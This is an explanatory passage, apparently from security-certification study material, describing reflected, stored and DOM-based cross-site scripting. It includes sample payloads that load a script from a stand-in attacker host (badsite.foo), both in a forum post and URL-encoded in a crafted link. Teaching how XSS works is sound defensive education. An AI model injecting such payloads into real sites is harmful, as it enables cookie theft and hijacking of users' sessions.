# CROSS-SITE SCRIPTING

#### CROSS-SITE SCRIPTING

Web applications depend on scripting, and most websites these days are web applications rather than static web pages. If the user attempts to disable scripting, very few sites will be left available. A **cross-site scripting (XSS)** attack exploits the fact that the browser is likely to trust scripts that appear to come from a site the user has chosen to visit. XSS inserts a malicious script that appears to be part of the trusted site. A nonpersistent type of XSS attack would proceed as follows:

  
2.  The attacker identifies an input validation vulnerability in the trusted site.
  
4.  The attacker crafts a URL to perform a code injection against the trusted site. This could be coded in a link from the attacker's site to the trusted site or a link in an email message.
  
6.  When the user clicks the link, the trusted site returns a page containing the malicious code injected by the attacker. As the browser is likely to be configured to allow the site to run scripts, the malicious code will execute.
  

The malicious code could be used to deface the trusted site (by adding any sort of arbitrary HTML code), steal data from the user's cookies, try to intercept information entered into a form, perform a request forgery attack, or try to install malware. The crucial point is that the malicious code runs in the client's browser with the same permission level as the trusted site.

An attack where the malicious input comes from a crafted link is a reflected or nonpersistent XSS attack. A stored/persistent XSS attack aims to insert code into a back-end database or content management system used by the trusted site. For example, the attacker may submit a post to a bulletin board with a malicious script embedded in the message. When other users view the message, the malicious script is executed. For example, with no input sanitization, a threat actor could type the following into a new post text field:

```Markdown
Check out this amazing <a href="https://trusted.foo">website</a><script src="https://badsite.foo/hook.js"></script>.
``` 

Users viewing the post will have the malicious script hook.js execute in their browser.

A third type of XSS attack exploits vulnerabilities in client-side scripts. Such scripts often use the **Document Object Model (DOM)** to modify the content and layout of a web page. For example, the "document.write" method enables a page to take some user input and modify the page accordingly. An exploit against a client-side script could work as follows:

1.  The attacker identifies an input validation vulnerability in the trusted site. For example, a message board might take the user's name from an input text box and show it in a header.
```Markdown
bash https://trusted.foo/messages?user=james
```  
4.  The attacker crafts a URL to modify the parameters of a script that the server will return, such as:
```Markdown
bash https://trusted.foo/messages#user=James%3Cscript%20src%3D%22https%3A%2F%2Fbadsite.foo%2Fhook.js%22%3E%3C%2Fscript%3E
```  
7.  The server returns a page with the legitimate DOM script embedded, but containing the parameter:
```Markdown
bash James<script src="https://badsite.foo/hook.js"></script>
```  
10.  The browser renders the page using the DOM script, adding the text "James" to the header, but also executing the hook.js script at the same time.